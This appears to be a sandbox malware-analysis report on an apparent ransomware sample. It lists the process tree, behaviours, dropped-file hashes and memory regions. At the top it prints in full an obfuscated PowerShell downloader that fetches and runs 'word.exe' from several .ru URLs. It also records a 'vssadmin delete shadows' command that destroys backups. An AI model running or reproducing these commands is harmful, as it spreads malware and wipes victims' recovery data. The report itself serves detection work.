C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \"000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\".spl000it(\",\");$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \"c:\win000dows\tem000p\229.ex000e\";for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\windows\temp\229.exe"C:\windows\temp\229.exe"4⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops startup file
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5501⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotxFilesize
4.0MB
MD5b1cff93a5ffaa02a482145399dd2ca08
SHA12f6c2f98ab25544ac4141542e55db167a4b66cd4
SHA25645130fa2ce44505b355def932b862ac2c4c64c760e8a62fe4fafa543caa6b99c
SHA512a7e203a702b562ee40aaacacad43553e092c850c2fb3c4cc1020f2cc54236705636b55e4b876e11b5df676c2e6c9721fee31feccffca7f92ef4b128a81ce59e4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Office\MSO1033.aclFilesize
37KB
MD54f13d08e827b2e667f511902c02da790
SHA1fb951c9bc90b6ab09ff148ca590c61b108c4d9de
SHA2568451b29eb14b901aa9d44fb7dbec865df4a2d6c75b05361ce556a9b99a1d09fb
SHA51272d4ce0990b6f4e66f06e6a7addcaa95903774732f2cec999ffd1e38df683bc889b556f87e21d1c3aa9ab61d412ba4734fa768aea6b898718f66ed199de58b3c
-
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DICFilesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Windows\Temp\229.exeFilesize
535KB
MD5a76b7140cf6d5c4dc5e0ecff23fc2ce0
SHA1b312fef877f8eae6ca473a969f30bc85d907f7e3
SHA2563a23fe7b3f8fa4d22a18aafc9c3c52746a7142cd33f8ddaaa264cf475939b972
SHA5126a74b01537acf60408072d60f6a7b87c3f0d04a96301a3c1a051552f2248377c457a2a83505a6761017a2680ffce0c33cd8b4fa99e75212e13cdebd0a2f322e1
-
\Windows\Temp\229.exeFilesize
535KB
MD5a76b7140cf6d5c4dc5e0ecff23fc2ce0
SHA1b312fef877f8eae6ca473a969f30bc85d907f7e3
SHA2563a23fe7b3f8fa4d22a18aafc9c3c52746a7142cd33f8ddaaa264cf475939b972
SHA5126a74b01537acf60408072d60f6a7b87c3f0d04a96301a3c1a051552f2248377c457a2a83505a6761017a2680ffce0c33cd8b4fa99e75212e13cdebd0a2f322e1
-
memory/556-81-0x000000006A530000-0x000000006AADB000-memory.dmpFilesize
5.7MB
-
memory/556-79-0x0000000004AA0000-0x0000000004BB4000-memory.dmpFilesize
1.1MB
-
memory/556-76-0x0000000000000000-mapping.dmp
-
memory/564-75-0x0000000000000000-mapping.dmp
-
memory/740-92-0x0000000000000000-mapping.dmp
-
memory/1408-78-0x0000000000000000-mapping.dmp
-
memory/1408-80-0x000007FEFBAF1000-0x000007FEFBAF3000-memory.dmpFilesize
8KB
-
memory/1476-87-0x00000000002B0000-0x00000000002D0000-memory.dmpFilesize
128KB
-
memory/1476-83-0x0000000000000000-mapping.dmp
-
memory/1476-86-0x0000000000400000-0x000000000048D000-memory.dmpFilesize
564KB
-
memory/1732-60-0x00000000007DB000-0x00000000007DF000-memory.dmpFilesize
16KB
-
memory/1732-54-0x0000000072471000-0x0000000072474000-memory.dmpFilesize
12KB
-
memory/1732-61-0x00000000007E7000-0x000000000084B000-memory.dmpFilesize
400KB
-
memory/1732-59-0x00000000007DB000-0x00000000007DF000-memory.dmpFilesize
16KB
-
memory/1732-62-0x00000000007E7000-0x000000000084B000-memory.dmpFilesize
400KB
-
memory/1732-63-0x00000000007E7000-0x000000000084B000-memory.dmpFilesize
400KB
-
memory/1732-58-0x0000000070EDD000-0x0000000070EE8000-memory.dmpFilesize
44KB
-
memory/1732-57-0x00000000755C1000-0x00000000755C3000-memory.dmpFilesize
8KB
-
memory/1732-56-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/1732-55-0x000000006FEF1000-0x000000006FEF3000-memory.dmpFilesize
8KB
-
memory/1944-91-0x0000000000000000-mapping.dmp